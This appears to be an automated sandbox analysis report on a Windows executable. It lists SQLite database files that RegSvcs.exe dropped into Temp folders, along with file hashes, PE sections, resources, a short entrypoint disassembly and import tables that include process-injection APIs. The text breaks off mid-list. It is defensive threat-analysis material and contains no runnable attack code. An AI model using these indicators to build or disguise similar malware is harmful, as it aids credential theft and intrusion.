Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpC964.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpC965.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpC976.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpC977.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpC988.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpC998.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpC9A9.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpC9B9.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpDA.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpEA.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpFB.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpFC.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.5890401905077685
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	b3u71vBG0u.exe
File size:	1'072'128 bytes
MD5:	464709f3215d06f6703eb4ecb607ae7a
SHA1:	1f438f2ab699f842cec119981ae5bf799df5d203
SHA256:	a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36
SHA512:	007b3d6c7da18c9d8b31991520d18fa2ee323cf8b4d8ea153d74cf93d5bfb38df79bc65a968cc6e07c996c451f0f1c8b2a0b9f0529a6b67ca148cc27adf1eda9
SSDEEP:	24576:3AHnh+eWsN3skA4RV1Hom2KXMmHaeAfg3sujtg5:qh+ZkldoPK8YaeAfTYg
TLSH:	DA35AD0277D6C03AFFAB92735B5AB20196BC7D690133852F13983DB9B9701B1236D663
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P.....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r.............#.S..._@'.S...R.k.S.....".S...RichR..

File Icon


Icon Hash:	c9ac80a0a1a98851

Static PE Info

General

Entrypoint:	0x42800a
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x667B661A [Wed Jun 26 00:51:38 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	afcdf79be1557326c854b6e20cb900a7

Entrypoint Preview

Instruction
call 00007FE69D06DA3Dh
jmp 00007FE69D0607F4h
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
push edi
push esi
mov esi, dword ptr [esp+10h]
mov ecx, dword ptr [esp+14h]
mov edi, dword ptr [esp+0Ch]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe 00007FE69D06097Ah
cmp edi, eax
jc 00007FE69D060CDEh
bt dword ptr [004C41FCh], 01h
jnc 00007FE69D060979h
rep movsb
jmp 00007FE69D060C8Ch
cmp ecx, 00000080h
jc 00007FE69D060B44h
mov eax, edi
xor eax, esi
test eax, 0000000Fh
jne 00007FE69D060980h
bt dword ptr [004BF324h], 01h
jc 00007FE69D060E50h
bt dword ptr [004C41FCh], 00000000h
jnc 00007FE69D060B1Dh
test edi, 00000003h
jne 00007FE69D060B2Eh
test esi, 00000003h
jne 00007FE69D060B0Dh
bt edi, 02h
jnc 00007FE69D06097Fh
mov eax, dword ptr [esi]
sub ecx, 04h
lea esi, dword ptr [esi+04h]
mov dword ptr [edi], eax
lea edi, dword ptr [edi+04h]
bt edi, 03h
jnc 00007FE69D060983h
movq xmm1, qword ptr [esi]
sub ecx, 08h
lea esi, dword ptr [esi+08h]
movq qword ptr [edi], xmm1
lea edi, dword ptr [edi+08h]
test esi, 00000007h
je 00007FE69D0609D5h
bt esi, 03h

Rich Headers

Programming Language:

[ASM] VS2013 build 21005
[ C ] VS2013 build 21005
[C++] VS2013 build 21005
[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[ASM] VS2013 UPD5 build 40629
[RES] VS2013 build 21005
[LNK] VS2013 UPD5 build 40629

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xbc0cc	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc8000	0x3b538	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x104000	0x7134	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x92bc0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xa4b50	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8f000	0x884	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x8dfdd	0x8e000	310e36668512d53489c005622bb1b4a9	False	0.5735602580325704	data	6.675248351711057	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8f000	0x2fd8e	0x2fe00	748cf1ab2605ce1fd72d53d912abb68f	False	0.32828818537859006	data	5.763244005758284	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xbf000	0x8f74	0x5200	aae9601d920f07080bdfadf43dfeff12	False	0.1017530487804878	data	1.1963819235530628	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xc8000	0x3b538	0x3b600	93064427e6e9de530c23632528de4d65	False	0.5920641447368421	data	6.149767445220696	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x104000	0x7134	0x7200	f04128ad0f87f42830e4a6cdbc38c719	False	0.7617530153508771	data	6.783955557128661	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xc8548	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.7466216216216216
RT_ICON	0xc8670	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors	English	Great Britain	0.3277027027027027
RT_ICON	0xc8798	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0xc88c0	0x1cc1	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	Great Britain	0.9485124303763076
RT_ICON	0xca584	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 2835 x 2835 px/m	English	Great Britain	0.07214894120430616
RT_ICON	0xdadac	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16384, resolution 2835 x 2835 px/m	English	Great Britain	0.11059282002834199
RT_ICON	0xdefd4	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2835 x 2835 px/m	English	Great Britain	0.1491701244813278
RT_ICON	0xe157c	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2835 x 2835 px/m	English	Great Britain	0.15806754221388367
RT_ICON	0xe2624	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2835 x 2835 px/m	English	Great Britain	0.2916666666666667
RT_MENU	0xe2a8c	0x50	data	English	Great Britain	0.9
RT_STRING	0xe2adc	0x594	data	English	Great Britain	0.3333333333333333
RT_STRING	0xe3070	0x68a	data	English	Great Britain	0.2747909199522103
RT_STRING	0xe36fc	0x490	data	English	Great Britain	0.3715753424657534
RT_STRING	0xe3b8c	0x5fc	data	English	Great Britain	0.3087467362924282
RT_STRING	0xe4188	0x65c	data	English	Great Britain	0.34336609336609336
RT_STRING	0xe47e4	0x466	data	English	Great Britain	0.3605683836589698
RT_STRING	0xe4c4c	0x158	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	Great Britain	0.502906976744186
RT_RCDATA	0xe4da4	0x1e22e	data			1.0003726567183526
RT_GROUP_ICON	0x102fd4	0x5a	data	English	Great Britain	0.7888888888888889
RT_GROUP_ICON	0x103030	0x14	data	English	Great Britain	1.25
RT_GROUP_ICON	0x103044	0x14	data	English	Great Britain	1.15
RT_GROUP_ICON	0x103058	0x14	data	English	Great Britain	1.25
RT_VERSION	0x10306c	0xdc	data	English	Great Britain	0.6181818181818182
RT_MANIFEST	0x103148	0x3ef	ASCII text, with CRLF line terminators	English	Great Britain	0.5074478649453823

Imports

DLL	Import
WSOCK32.dll	WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
VERSION.dll	GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll	ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll	WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll	InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
PSAPI.DLL	GetProcessMemoryInfo
IPHLPAPI.DLL	IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll	DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll	IsThemeActive
KERNEL32.dll	DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
USER32.dll	AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, 